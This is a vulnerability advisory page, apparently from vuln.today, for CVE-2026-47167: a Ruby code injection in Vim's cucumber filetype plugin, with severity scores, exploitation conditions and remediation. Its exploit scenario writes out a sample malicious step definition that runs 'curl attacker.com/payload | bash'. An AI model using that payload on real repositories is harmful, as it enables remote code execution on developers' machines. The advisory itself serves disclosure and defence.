Skip to main content

Vim CVE-2026-47167

| EUVD-2026-36280 MEDIUM
Code Injection (CWE-94)
2026-06-11 GitHub_M
Code Injection RCE Vim
5.1
CVSS 4.0 · Vendor: GitHub_M
Share

Severity by source

Vendor (GitHub_M) PRIMARY
5.1 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
7.5 HIGH

AC:H for the non-default +ruby build prerequisite; PR:N because attacker needs no victim-system credentials; S:U since shell commands execute under the same user context as Vim.

3.1 AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
4.0 AV:N/AC:H/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from Vendor (GitHub_M).

CVSS VectorVendor: GitHub_M

CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
P
Scope
X

Lifecycle Timeline

3
Patch available
Jun 11, 2026 - 20:01 EUVD
Source Code Evidence Fetched
Jun 11, 2026 - 19:30 vuln.today
Analysis Generated
Jun 11, 2026 - 19:30 vuln.today

DescriptionCVE.org

Vim is an open source, command line text editor. Prior to version 9.2.0496, a code injection vulnerability exists in s:stepmatch() in the cucumber filetype plugin (runtime/ftplugin/cucumber.vim) on Vim builds with +ruby support. Step-definition patterns read from .rb files under the repository's features/*/ or stories/*/ directories are embedded into a Ruby Kernel.eval argument without sufficient escaping, allowing a crafted pattern in an attacker-controlled repository to execute arbitrary Ruby (and through it arbitrary shell commands) when the user invokes a step-jump mapping ([d, ]d). This issue has been patched in version 9.2.0496.

AnalysisAI

Code injection via unsanitized step-definition patterns in Vim's cucumber filetype plugin allows arbitrary Ruby and shell command execution on any Vim build compiled with +ruby support, prior to version 9.2.0496. An attacker who controls .rb step definition files in a repository can craft a regex-terminating payload that escapes a Kernel.eval() argument, enabling full shell access as the victim's user when the developer invokes the [d or ]d step-jump mapping. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Craft malicious .rb step definition with injected payload
Delivery
Host or contribute it to a repository
Exploit
Victim clones repository and opens .feature file in +ruby Vim
Install
Victim presses [d on a step line
C2
s:stepmatch() embeds pattern into Kernel.eval()
Execute
Arbitrary Ruby executes system() call
Impact
Shell commands run as victim user
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Exploitation requires three concurrent conditions: (1) the victim's Vim binary must be compiled with +ruby support - this is a non-default build option absent from the standard Vim packages shipped by Debian, Ubuntu, and many other distributions (verify with vim --version); (2) the victim must open a .feature (Cucumber) file sourced from a repository where the attacker controls at least one .rb step definition file under a features/*/ or stories/*/ subdirectory; and (3) the victim must invoke the [d or ]d step-jump mapping while the cursor is positioned on a step line - this is an explicit keystroke, not triggered by merely opening or saving the file. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The vendor-assigned CVSS 4.0 score of 5.1 (Medium) with vector AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:L reflects a conservative impact framing, but the actual code-execution capability warrants a higher severity assessment when +ruby is present. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker contributing to or creating a public Cucumber Ruby repository embeds a malicious step definition such as Given /xyzzy/; system("curl attacker.com/payload | bash"); #/ do in a .rb file under features/step_definitions/. When a victim developer clones the repository and opens a corresponding .feature file in a +ruby Vim build, pressing [d on a step line causes s:stepmatch() to call Kernel.eval() with the injected pattern, executing the shell payload as the victim's user. …
Remediation Upgrade to Vim 9.2.0496 or later, available at https://github.com/vim/vim/releases/tag/v9.2.0496; the fix commit is https://github.com/vim/vim/commit/a65a52d684bc58535ad28a4ae824d22e76399934. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Threat intelligence, references, and detailed analysis are available after sign-in.

More from same product – last 7 days

CVE-2026-47162 HIGH
7.3 Jun 11

Vimscript code injection in the netrw plugin shipped with Vim before 9.2.0495 allows attackers who can plant or have a v
CVE-2026-52859 MEDIUM
6.9 Jun 11

Out-of-bounds read in Vim's built-in terminal emulator (`:terminal` feature) prior to version 9.2.0565 allows a program

Share

CVE-2026-47167 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy